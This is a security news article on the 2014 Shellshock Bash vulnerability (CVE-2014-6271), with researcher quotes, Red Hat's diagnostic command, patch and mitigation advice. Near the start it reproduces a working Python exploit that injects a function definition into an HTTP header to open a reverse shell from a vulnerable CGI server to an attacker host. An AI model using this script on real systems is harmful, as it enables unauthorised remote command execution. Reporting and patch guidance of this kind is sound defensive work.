“GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution.” states the description for the Bash Bug flaw in the NIST National Vulnerability Database, which rated its severity as 10 out of 10.
#
#Bash Bug
#CVE-2014-6271 cgi-bin reverse shell
#
import httplib,urllib,sys

if (len(sys.argv)<4):
    print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0]
    print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
    exit(0)

conn = httplib.HTTPConnection(sys.argv[1])
reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]
headers = {"Content-type": "application/x-www-form-urlencoded", "test":reverse_shell }
conn.request("GET",sys.argv[2],headers=headers)
res = conn.getresponse()
print res.status, res.reason
data = res.read()
print data
Similar attacks are possible via OpenSSH. “We have also verified that this vulnerability is exposed in ssh—but only to authenticated sessions. Web applications like cgi-scripts may be vulnerable based on a number of factors; including calling other applications through a shell, or evaluating sections of code through a shell.” Stephane warned. However, this exploit would not work for an attacker who does not have an SSH account.
The overall impact of the Bash Bug vulnerability is far-reaching, because Bash is commonly used to execute commands from other programs. Security experts compare the risk of exposure of Bash Bug to that of the Heartbleed bug.
“The first reason is that the bug interacts with other software in unexpected ways. We know that interacting with the shell is dangerous, but we write code that does it anyway. An enormous percentage of software interacts with the shell in some fashion. Thus, we’ll never be able to catalogue all the software out there that is vulnerable to the bash bug.” states Robert Graham on his blog, Errata Security.
To check whether a Linux or Unix system is vulnerable, users can run the diagnostic test proposed by Red Hat:
$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
If the output of the above command looks as follows:
vulnerable
this is a test
you are using a vulnerable version of Bash. The patch used to fix this issue ensures that no code is allowed after the end of a Bash function. Thus, if you run the above example with the patched version of Bash, you should get an output similar to:
$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test
If your system is vulnerable, fix the issue by updating to the most recent version of the Bash package with the following command:
# yum update bash
To mitigate the Bash Bug, it is recommended to disable any CGI scripts that call on the shell and to upgrade your Bash software package as soon as possible. The principal Linux distribution vendors have released new Bash versions:
- Red Hat Enterprise Linux (versions 4 through 7) and the Fedora distribution
- CentOS (versions 5 through 7)
- Ubuntu 10.04 LTS, 12.04 LTS, and 14.04 LTS
- Debian
The Bash Bug flaw is particularly dangerous for Internet-of-things devices like smart meters, routers, web cameras and any other device that runs software which allows bash scripts. Typically, such software is not easily patchable and is more likely to expose the critical flaw on the Internet.
As Graham said: “Unlike Heartbleed, which only affected a specific version of OpenSSL, this bash bug has been around for a long, long time. That means there are lots of old devices on the network vulnerable to this bug. The number of systems needing to be patched, but which won’t be, is much larger than Heartbleed.”
(Security Affairs – Bash Bug, Linux)
UPDATE: CERT-UK just released a Security Advisory:
https://www.cert.gov.uk/resources/advisories/bash-vulnerability-aka-shellshock/